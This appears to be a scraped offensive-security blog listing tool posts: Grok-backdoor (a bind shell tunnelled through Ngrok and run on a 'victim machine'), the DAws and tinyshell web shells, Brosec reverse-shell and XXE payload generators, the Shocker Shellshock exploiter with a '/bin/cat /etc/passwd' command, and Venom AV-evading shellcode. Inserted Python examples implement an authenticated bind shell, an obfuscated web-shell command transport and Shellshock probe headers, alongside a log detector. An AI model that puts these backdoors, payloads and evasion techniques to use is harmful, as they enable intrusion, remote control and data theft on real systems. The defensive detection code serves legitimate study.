Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

Showing posts with label Shell. Show all posts

Sunday, August 12, 2018

Grok-backdoor - Backdoor With Ngrok Tunnel Support


Grok-backdoor is a simple Python-based backdoor that uses an Ngrok tunnel for its communication. It can generate Windows, Linux and macOS binaries using PyInstaller. Note that PyInstaller packages for the platform it runs on, so build on a host of each target platform rather than expecting a cross-compiled binary.

Disclaimer:
All the code provided in this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository are solely your responsibility. Misuse of the code in this repository can result in criminal charges being brought against the persons in question. The author will not be held responsible in the event that criminal charges are brought against any individuals misusing the code in this repository to break the law.

Dependencies:
  • Python 2.7
  • Pyinstaller 3.21
  • python-pip 9.0.1

Installation :
pip install -r requirements.txt

Usage:
You need to register an account at ngrok.com to use this backdoor and provide your Ngrok auth token when configuring grok-backdoor. Once the grok-backdoor server is running on the victim machine you will see a new TCP tunnel in the Ngrok status panel.
Create the backdoor binary (on Linux or Windows) by running:
python grok-backdoor.py

You can find the output binary in the grok-backdoor/dist/ directory.

Run the grok-backdoor output binary on the victim machine and log in to the Ngrok.com control panel to see the tunnel URL.

Telnet to the tunnel URL to get the bind shell. Enjoy shell :)


Features:
  • Multi-platform support (Windows, Linux, macOS)
  • Authenticated bind shell
  • Ngrok tunnel for communication
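The two features that matter here are the bind shell and the authentication in front of it; the Ngrok tunnel only forwards a public TCP endpoint to the listener's port. The following is an added example (not Grok-backdoor's own code, which is Python 2.7 and prompts for a password) showing what an authenticated bind shell looks like when the password prompt is replaced by an HMAC-SHA256 challenge/response, so the shared secret never crosses the wire. It is Python 3, binds 127.0.0.1 instead of exposing a tunnel, and runs one command per connection with a timeout. Everything here is constructed for illustration.

```python
import hashlib
import hmac
import os
import shlex
import socket
import subprocess
import threading

NONCE_LEN = 16   # server challenge, bytes
TAG_LEN = 32     # HMAC-SHA256 tag, bytes


def _recv_exact(sock, n):
    """Read exactly n bytes, raising ConnectionError on EOF."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf


def _recv_line(sock):
    """Read one newline-terminated line and return it without the newline."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            raise ConnectionError("peer closed the connection")
        buf += chunk
    return buf[:-1]


def _handle_client(conn, key):
    """One session: send a nonce, verify the tag, run a single command."""
    with conn:
        nonce = os.urandom(NONCE_LEN)
        conn.sendall(nonce)
        try:
            tag = _recv_exact(conn, TAG_LEN)
            expected = hmac.new(key, nonce, hashlib.sha256).digest()
            # constant-time comparison: no timing leak on the tag bytes
            if not hmac.compare_digest(tag, expected):
                conn.sendall(b"AUTH FAIL\n")
                return
            conn.sendall(b"AUTH OK\n")
            argv = shlex.split(_recv_line(conn).decode("utf-8", "replace"))
        except ConnectionError:
            return
        if not argv:
            return
        try:
            # shell=False: argv runs as given, no /bin/sh in between
            result = subprocess.run(argv, capture_output=True, timeout=30)
            output = result.stdout + result.stderr
        except (OSError, subprocess.TimeoutExpired) as exc:
            output = str(exc).encode()
        conn.sendall(output)


def start_server(key, host="127.0.0.1", port=0):
    """Bind a listener, serve clients on a daemon thread, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)

    def accept_loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_handle_client, args=(conn, key),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def client_exec(host, port, key, command):
    """Authenticate to the bind shell, run one command, return its output."""
    with socket.create_connection((host, port), timeout=10) as sock:
        nonce = _recv_exact(sock, NONCE_LEN)
        sock.sendall(hmac.new(key, nonce, hashlib.sha256).digest())
        if _recv_line(sock) != b"AUTH OK":
            raise PermissionError("bind shell rejected the authentication tag")
        sock.sendall(command.encode() + b"\n")
        sock.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            chunks.append(chunk)
        return b"".join(chunks)


if __name__ == "__main__":
    secret = os.urandom(32)          # shared out of band in a real deployment
    listening_port = start_server(secret)
    print(client_exec("127.0.0.1", listening_port, secret, "uname -a").decode())
```

With Ngrok in the picture the only change is the address the client connects to: the tunnel's public host:port instead of 127.0.0.1. Because the tunnel endpoint is reachable by anyone who can see the Ngrok dashboard URL, the authentication step is what keeps the listener from being a public shell.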


Thursday, September 21, 2017

Advanced Web Shell - DAws


There are multiple things that make DAws better than every other web shell out there:
  1. Bypasses security systems (IPS, WAFs, etc.) like Suhosin (uses up to 20 PHP functions just to get a command executed).
  2. Drops CGI shells and communicates with them to bypass security systems.
  3. Uses the SSH authorized_keys method to bypass security systems.
  4. Uses Shellshock in 2 methods to bypass security systems.
  5. Is completely POST-based and uses XOR encryption with a random key that is generated for every new session, plus private base64 functions, to bypass security systems.
  6. Supports Windows and Linux.
  7. Finds a writable and readable directory and moves there if it's a web directory; DAws will output everything in that found directory.
  8. Drops a php.ini and a .htaccess file that clear all disablers in case "suphp" is installed.
  9. Has an advanced file manager.
  10. Everything is done automatically so there's nothing for the user to worry about.
  11. Open source.
  12. And much more (check the source for more information; everything is well commented).

Credits:



Sunday, October 16, 2016

Python Client with PHP Shell - tinyshell



A Python client paired with a PHP shell; the client connects to the shell and sends commands over HTTP using POST and GET requests.

Features
  1. Connects with a direct session; no reverse connection is needed.
  2. Supports password protection.
  3. Can be bound to any file without damage.
  4. Uses GET/POST requests with error handling.

Usage
The project consists of two files:
  1. Remote shell Python file: the client used to connect to the target: python remote shell.py url password
  2. PHP shell file: the PHP backdoor. The password can be edited manually by modifying the code.
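Both DAws (item 5 above: POST-only, XOR with a per-session random key, private base64 functions) and tinyshell (a password-protected shell driven by a Python client) rely on the same transport idea: a password field plus an obfuscated command in a POST body. The following is an added example, not code from either project, that implements that transport in Python 3 on both ends and then shows the defender's view. The field names pw/k/c, the private alphabet and the decision to carry the session key in the request are assumptions for this example; which side generates the key does not change the conclusion, since it crosses the wire in the clear either way.

```python
import base64
import hmac
import os
from urllib.parse import parse_qs, urlencode

# A "private" base64 alphabet: a permutation of the standard one. Both ends
# must share it, so it defeats signature matching on the wire but hides
# nothing from anyone holding either side's code.
STD_ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
PRIVATE_ALPHABET = b"zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210_-"
_TO_PRIVATE = bytes.maketrans(STD_ALPHABET, PRIVATE_ALPHABET)
_FROM_PRIVATE = bytes.maketrans(PRIVATE_ALPHABET, STD_ALPHABET)


def xor_bytes(data, key):
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def private_b64encode(data):
    return base64.b64encode(data).translate(_TO_PRIVATE)


def private_b64decode(data):
    return base64.b64decode(bytes(data).translate(_FROM_PRIVATE))


def new_session_key(length=16):
    """Fresh random XOR key for each new session."""
    return os.urandom(length)


def build_request_body(password, session_key, command):
    """Client side: POST body with the shell password, the session key and
    the XOR-obfuscated command. Everything is a POST field, so the command
    never appears in the query string or in access logs."""
    fields = {
        "pw": password,
        "k": private_b64encode(session_key).decode(),
        "c": private_b64encode(xor_bytes(command.encode(), session_key)).decode(),
    }
    return urlencode(fields)


def parse_request_body(body, expected_password):
    """Server side (what the PHP shell does): constant-time password check,
    then recover the command. Returns None on any failure."""
    fields = parse_qs(body, keep_blank_values=True)
    try:
        password = fields["pw"][0]
        key = private_b64decode(fields["k"][0].encode())
        blob = private_b64decode(fields["c"][0].encode())
    except (KeyError, IndexError, ValueError):
        return None
    if not hmac.compare_digest(password.encode(), expected_password.encode()):
        return None
    if not key:
        return None
    return xor_bytes(blob, key).decode("utf-8", "replace")


def decode_captured_body(body):
    """Analyst side: the key travels with the request, so a packet capture or
    WAF log decodes the command with no secret at all. The XOR layer is
    signature evasion, not confidentiality."""
    fields = parse_qs(body, keep_blank_values=True)
    key = private_b64decode(fields["k"][0].encode())
    blob = private_b64decode(fields["c"][0].encode())
    return xor_bytes(blob, key).decode("utf-8", "replace")
```

The practical consequence for detection: matching on the literal command string fails, but matching on the structure (a fixed set of POST fields, one of them a short random blob followed by a longer one in an unusual base64 alphabet) works, and any captured request can be decoded offline with decode_captured_body.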

Credits
Lawrence Amer - Vulnerability Lab Researcher.


Saturday, April 30, 2016

An interactive reference tool to help security professionals utilize useful payloads and commands - Brosec




Brosec is a terminal-based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec's most popular use cases is the ability to generate reverse shells (Python, Perl, PowerShell, etc.) on the fly and copy them to the clipboard.

Assuming the user has already set up the required variables (read on to learn how), a reverse shell using the awk command can be generated as easily as:



Payload Variables


Brosec allows you to store and retrieve values (in a local json db) for several variables in order to make command/payload generation easier. While some payloads will already include these variables, you can also include them in any payload that prompts for user input.

For example, the following shows how a Powershell download cradle can be generated using the LHOST and LPORT variables (the values of which had already been set).


Available variables
  • LHOST : Local IP or name
  • LPORT : Local port
  • RHOST : Remote IP or name
  • RPORT : Remote port
  • USER : Username (only used in a few payloads)
  • PROMPT : User Prompt (This isn't a stored value. Instead, payloads with this variable will prompt for input.)

Above are multiple examples of how to access and set the stored configuration variables.
  • Configuration variables can be viewed via the config command at any time, or by entering the variable name
  • Variables can be changed at any time by entering set <variable> <value>
  • You can also navigate to frequently used payloads by entering the menu sequence from the command line: bros <sequence>
    • Ex: bros 413 - This would automate entering 4 for the Web Menu, 1 for the XXE sub menu, and 3 for the XXE local file read payload

Additional Features and Usage Examples

XXE for Bros


In addition to payloads such as reverse shells, Brosec also has multiple XXE payloads that you can generate on the fly.

Simple HTTP(s) Server

Need a quick web server? Forget python SimpleHTTPServer, bros has your back with bros http when entered via the command line. An SSL server? bros https has you covered.



Anonymous FTP Server

Need to exfiltrate some data via ftp? Bros comes with a handy bros ftp when entered via the command line. The ftp server accepts anonymous downloads/uploads from the CWD (so be careful when running).


Installation

Releases
Some features are unavailable in the compiled version, but it is a good way to quickly try out Brosec.

Manual installation

Mac
  • brew install node netcat - Install Node.js and netcat (nc or ncat will work too)
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm dependencies

Kali Linux
  • apt-get install npm build-essential g++ xsel netcat - Install dependencies
  • npm config set registry http://registry.npmjs.org/ - The npm registry seems to be broken by default when installed from Kali repos
  • npm install -g n - Install n (Node.js version manager)
  • n latest - Install latest version of Node.js
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
  • cd Brosec && npm install - cd into the directory and install npm dependencies

Windows (Unsupported)
  • Install nodejs
  • Install ncat
  • git clone https://github.com/gabemarshall/Brosec.git - Clone Brosec repo
Payloads that utilize netcat will not work due to the kexec library not being supported in Windows

Optional

Add bros directory path to your PATH env variable, create a symlink for the bros file, etc


Configuration

Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc).



Tuesday, April 5, 2016

A tool to find and exploit servers vulnerable to Shellshock - Shocker



A tool to find and exploit servers vulnerable to Shellshock

Help Text

usage: shocker.py
  -h, --help                      show this help message and exit
  --Host HOST, -H HOST            A target hostname or IP address
  --file FILE, -f FILE            File containing a list of targets
  --port PORT, -p PORT            The target port number (default=80)
  --exploit EXPLOIT, -e EXPLOIT   Command to execute (default=/bin/uname -a)
  --cgi CGI, -c CGI               Single CGI to check (e.g. /cgi-bin/test.cgi)
  --proxy PROXY                   A BIT BROKEN RIGHT NOW Proxy to be used in the form 'ip:port'
  --ssl, -s                       Use SSL (default=False)
  --threads THREADS, -t THREADS   Maximum number of threads (default=10, max=100)
  --verbose, -v                   Be verbose in output

Usage Examples

./shocker.py -H 127.0.0.1 -e "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
Scans for http://127.0.0.1/cgi-bin/test.cgi and, if found, attempts to cat /etc/passwd
./shocker.py -H www.example.com -p 8001 -s
Scans www.example.com on port 8001 using SSL for all scripts in cgi_list and attempts the default exploit for any found
./shocker.py -f ./hostlist
Scans all hosts listed in the file ./hostlist with the default options
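Shocker's own request format and cgi_list are not reproduced on this page, so the following is an added example, not the tool's code, showing the two halves of the Shellshock problem a practitioner needs: how a probe for CVE-2014-6271 is built (a bash function definition in a header value that mod_cgi exports into the CGI's environment, with a marker so that a 200 response alone is not mistaken for success, which is exactly the false-positive problem the TODO list above mentions) and how the same pattern is detected in an Apache combined-format access log. The header names, the marker string and the sample log lines are constructed for this example.

```python
import re

# Shellshock (CVE-2014-6271): a bash function definition "() { ... };" in an
# environment variable value, followed by a trailing command that vulnerable
# bash versions execute when they import the variable.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache combined log format. Referer and User-Agent are the last two quoted
# fields; both reach CGI scripts as HTTP_REFERER / HTTP_USER_AGENT, which is
# why attackers put the payload there.
_COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def build_probe_headers(command, marker="shocker-probe"):
    """Request headers for a Shellshock probe against a CGI script. The
    leading 'echo' ends the CGI response headers so that the marker and the
    command output land in the HTTP body rather than being swallowed."""
    payload = f"() {{ :; }}; echo; echo {marker}; {command}"
    return {"User-Agent": payload, "Referer": payload, "Cookie": payload}


def probe_succeeded(status, body, marker="shocker-probe"):
    """Only the marker in the body proves execution; a 200 by itself just
    means the CGI exists and ran normally."""
    return status == 200 and marker in body


def is_shellshock_value(value):
    """Detect the function-definition-plus-command pattern in a header value."""
    return bool(SHELLSHOCK_RE.search(value))


def scan_access_log(lines):
    """Return (client_ip, request_path, field) for every combined-format line
    whose Referer or User-Agent carries a Shellshock payload."""
    hits = []
    for line in lines:
        m = _COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue
        parts = m.group("req").split(" ")
        path = parts[1] if len(parts) > 1 else m.group("req")
        for field in ("ref", "ua"):
            if is_shellshock_value(m.group(field)):
                hits.append((m.group("ip"), path, field))
                break
    return hits


# Constructed sample lines (not from any real server).
SAMPLE_LOG = [
    '203.0.113.9 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 512 "() { :; }; /bin/cat /etc/passwd" "() { :; }; /bin/cat /etc/passwd"',
    '198.51.100.4 - - [25/Sep/2014:10:02:15 +0000] "GET /index.html HTTP/1.1" '
    '200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [25/Sep/2014:10:03:40 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '404 210 "-" "() { ignored; }; /bin/uname -a"',
]

if __name__ == "__main__":
    print(build_probe_headers("/bin/uname -a")["User-Agent"])
    for hit in scan_access_log(SAMPLE_LOG):
        print("shellshock attempt:", hit)
```

Two caveats on the detector: the regex catches the plain form only, so percent-encoded or whitespace-varied payloads need normalisation first, and a 404 line (as in the third sample) is still an attempt worth alerting on even though that particular script was not present.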

Dependencies

Python 2.7+

Change Log

Changes in version 0.72 (December 2014)
  • Minor corrections to logic and typos
Changes in version 0.71 (December 2014)
  • Added timeout to urllib2.urlopen requests using a global 'TIMEOUT'
Changes in version 0.7 (November 2014)
  • Add interactive 'pseudo console' for further exploitation of a chosen vulnerable server
  • Attempted to clean up output buffering issues by wrapping sys.stdout in a class which flushes on every call to write
  • Added a progress indicator for use in time consuming tasks to reassure non-verbose users
Changes in version 0.6 (October 2014)
  • Preventing return codes other than 200 from being considered successes
  • Added ability to specify multiple targets in a file
  • Moved the 'cgi_list' list of scripts to attempt to exploit to a file
  • Fixed some output formatting issues
  • Fixed valid hostname/IP regex to allow single word hostnames
Changes in version 0.5 (October 2014)
  • Added ability to specify a single script to target rather than using cgi_list
  • Introduced a timeout on socket operations for host_check
  • Added some usage examples in the script header
  • Added an epilogue to the help text indicating presence of examples
Changes in version 0.4 (October 2014)
  • Introduced a thread count limit defaulting to 10
  • Removed colour support until I can figure out how to make it work in Windows and *nix equally well
  • Spelling corrections
  • More comprehensive cgi_list
  • Removes success_flag from output
Pre 0.4 (October 2014)
  • No idea

TODO
  • Identify and respond correctly to HTTP/200 response - false positives - Low priority/hassle
  • Implement curses for *nix systems - For the whole application or only pseudo terminal? - Low priority/prettiness
  • Thread the initial host check now that multiple targets are supported (and could make this bit time consuming)
  • Change verbose to integer value - quiet, normal, verbose, debug?
  • Add option to skip initial host checks for the sake of speed?
  • Add a summary of results before exiting
  • Save results to a file? Format?
  • Eventually the idea is to include multiple possible vectors but currently only one is checked.
  • Add Windows and *nix colour support - Low priority/prettiness
  • Add a timeout in interactive mode for commands which don't return, e.g. /bin/cat /dev/zero
  • Prettify - Low priority/prettiness (obviously)
  • Add support for scanning and exploiting SSH and SMTP? https://isc.sans.edu/diary/Shellshock+via+SMTP/18879
  • Add SOCKS proxy support, potentially using https://github.com/rpicard/socksonsocks/ from Robert Picard
  • Other stuff. Probably.



Sunday, February 21, 2016

Metasploit Shellcode Generator / Compiler / Listenner - Venom



The script uses msfvenom (Metasploit) to generate shellcode in different formats (c | python | ruby | dll | msi | hta-psh), injects the generated shellcode into a function (for example a Python function that executes the shellcode in RAM) and uses compilers such as gcc (the GNU compiler collection) or mingw32, or PyInstaller, to build the executable file. It also starts a multi/handler to receive the remote connection (reverse shell or Meterpreter session).

The 'shellcode generator' tool reproduces some of the techniques used by the Veil-Evasion framework, unicorn.py, PowerSploit, etc. Some payloads are not detected by AV solutions; one reason for that is the use of a function that executes the 2nd stage of the shell/Meterpreter directly in the target's RAM.

option  build      target     format          output
1       shellcode  unix       C               C
2       shellcode  windows    C               DLL
3       shellcode  windows    DLL             DLL
4       shellcode  windows    C               PYTHON/EXE
5       shellcode  windows    C               EXE
6       shellcode  windows    MSIEXEC         MSI
7       shellcode  windows    C               RUBY
8       shellcode  windows    POWERSHELL      BAT
9       shellcode  windows    HTA-PSH         HTA
10      shellcode  windows    PSH-CMD         PS1
11      shellcode  windows    PSH-CMD         BAT
12      shellcode  webserver  PHP             PHP
13      shellcode  multi OS   PYTHON(base64)  PYTHON



Tuesday, February 2, 2016

Perl Brik Platform - Metabrik



Smartphones have their apps, Web browsers have their apps, shells don’t. With Metabrik, we tried to merge the power of shells with the power of the Perl language by creating a platform allowing to quickly write reusable Briks.

Metabrik goals:

  • Glue the Perl language with a shell
  • Give a standardised API to write reusable Briks
  • Self-documented Briks to make them easy to use
  • Only 4 main shell commands to remember: use, set, get, run

Metabrik features:

  • Completion on Brik names, Commands and Attributes
  • Completion on file manipulation
  • Completion on Perl variable names
  • Command history and recalling
  • Customization support with a .rc file
  • Scripting support
  • Multiple Brik repositories support

Metabrik helps you to concentrate on scenarios instead of wasting your time searching how to use a program. You just have to reuse available Briks to perform your everyday job.

The two main ideas behind Metabrik are:

ºYou have the brain, code has the details
ºDo it once

Monday, January 4, 2016

KeyBox - A web-based SSH console that centrally manages administrative access to systems


KeyBox is a web-based SSH console that centrally manages administrative access to systems. Web-based administration is combined with management and distribution of users' public SSH keys. Key management and administration are based on profiles assigned to defined users.

Administrators can log in using two-factor authentication with FreeOTP or Google Authenticator. From there they can manage their public SSH keys or connect to their systems through a web shell. Commands can be shared across shells to make patching easier and eliminate redundant command execution.

KeyBox layers TLS/SSL on top of SSH and acts as a bastion host for administration. Protocols are stacked (TLS/SSL + SSH) so infrastructure cannot be exposed through tunneling / port forwarding. More details can be found in the following whitepaper: The Security Implications of SSH. Also, SSH key management is enabled by default to prevent unmanaged public keys and enforce best practices.

Prerequisites

To Run Bundled with Jetty

If you're not big on the idea of building from source...
Download keybox-jetty-vXX.XX.tar.gz
https://github.com/skavanagh/KeyBox/releases
Export environment variables
for Linux/Unix/OSX
    export JAVA_HOME=/path/to/jdk
    export PATH=$JAVA_HOME/bin:$PATH

for Windows
    set JAVA_HOME=C:\path\to\jdk
    set PATH=%JAVA_HOME%\bin;%PATH%

Start KeyBox
for Linux/Unix/OSX
    ./startKeyBox.sh
for Windows
    startKeyBox.bat
How to Configure SSL in Jetty (it is a good idea to add or generate your own unique certificate)
http://wiki.eclipse.org/Jetty/Howto/Configure_SSL

Using KeyBox

Open browser to https://<whatever ip>:8443
Login with
username:admin
password:changeme
(change this default credential on first login; the bastion is only as strong as its admin account)

Steps:
1. Create systems
2. Create profiles
3. Assign systems to profiles
4. Assign profiles to users
5. Users can log in to create sessions on assigned systems
6. Start a composite SSH session or create and execute a script across multiple sessions
7. Add additional public keys to systems
8. Disable any administrative public key, forcing key rotation
9. Audit session history

Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition